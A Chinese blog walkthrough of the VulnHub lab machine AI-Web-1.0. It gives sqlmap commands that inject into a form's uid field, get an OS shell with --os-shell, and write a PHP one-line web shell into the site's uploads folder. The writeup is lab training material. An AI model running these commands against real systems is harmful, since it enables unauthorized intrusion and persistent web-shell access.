AI-web-1.0

于 2024-07-29 17:13:19 发布
阅读量159 收藏
点赞数 4
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140775603
版权

1.打开靶机,扫端口目录

访问网页

2.使用kali,用sqlmap跑

sqlmap -u  "http://192.168.87.132/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs

sqlmap -u  "http://192.168.109.141/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns

没有什么有用的信息

3.直接使用--os-shell

sqlmap -u  "http://192.168.109.141/se3reTdir777/" -data "uid=1&Operation=Submit" --os-shell

 选4

选2

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

3.在kali桌面写一句话木马文件,用 sqlmap 工具写入一句话木马

–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址

sqlmap -u "http://192.168.109.141/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

在os-shell查看

4.使用蚁剑连接

发生什么事了318
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2476
AI-WEB-1.0靶机的简单攻略
vulnhub之AI-Web-1.0
m_de_g的博客
04-27 640
linux。
AI-Web-1.0靶场
qq_46187131的博客
03-27 1292
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4163
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 962
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
聊天留言Luo-book 1.0-luobook.rar
04-07
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
web1.0-2.0-3.0的区别以及设想web4.0.docx
10-21
它不仅提供了更丰富的交互体验,还通过语义理解和人工智能技术,实现了跨网站的数据交互和整合。Web3.0让用户能够在不同的平台上无缝使用自己的数据,无需下载额外的软件就能享受复杂的功能,如即时通讯。此外,Web...
交友会员TechWeb同事录UCH调查插件 v1.0-uch-vote-1.0.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
Python库 | fungit-1.0-py3-none-any.whl
03-20
Python作为一门高级编程语言,以其简洁的语法和丰富的库生态而广受欢迎,适用于各种领域,包括Web开发、数据分析、机器学习、人工智能等。 在压缩包子文件的文件名称列表中,唯一列出的是"fungit-1.0-py3-none-any....
Python库 | jesspack-1.0-py3-none-any.whl
03-21
它支持面向对象、函数式和过程式编程风格,广泛应用于Web开发、数据分析、人工智能、自动化脚本等多个领域。Python的社区活跃,持续不断地推出新的库和框架,以适应不断变化的技术需求。 **总结** "Jesspack-1.0-...
ASP.NET Web Api 使用 EF 6,DateTime 字段如何取数据库服务器当前时间
yangshuquan的专栏
07-24 825
在做数据库设计时,为了方便进行数据追踪,通常会有几个字段是每个表都有的,比如创建时间、创建人、更新时间、更新人等,这些时间字段一般存储的是数据库服务器的时间,EF 是操作整个数据表对象,所以需要寻找方法来实现这个目的。本文分享 DB First 和 Code First 两种模式的 EF 中 DateTime 字段如何存储数据库服务器当前时间的方法。
Windows10+vs 2017中创建WEB API教程
Explinks的博客
07-24 1026
本文将介绍如何在Windows10+vs 2017中创建web Api的教程。目前本教程当中的方法在Win10 + VS2017(MVC5)win server2016+vs2017,vs2013 vs2019当中测试通过。
Hutool SoapClient 调用使用@webservice 发布的webService接口,参数传递为空
FangX_u的博客
07-24 606
采用工具类Hutool SoapClient调用@webservice 发布的webService接口时,参数传递不到webService,可以借助SoapUI工具辅助查看。
TS如何处理js模块的类型?
闻人放歌的三寸青草园圃
07-24 285
【代码】TS如何处理js模块的类型?
苍穹外卖浏览器前端界面修改
程序员象漂亮的博客
07-25 240
客户原始方案是期望做一个Spring Boot + Vue的饿了么系统,但时间上太仓促,所以建议选择开源的苍穹外码目作为作业提交。客户接受了建议的方案后,期望对前端页面提出了一些个性化的定制修改。
electron 主进程和渲染进程
qq_21087199的博客
07-29 215
虽然最近一年前端大环境不好,但是大家还是要加油鸭!,努力总不会错,千军万马过独木桥,希望大家都是闯过去那一个。进入正题。
基于上云api前端开发经验教训(loading...)
IIIIIAN
07-26 411
对于上云api开发学习过程中的错误教训积累总结
前端 axios 封装
最新发布
清云
07-29 330
前端 axios 封装
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 668
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值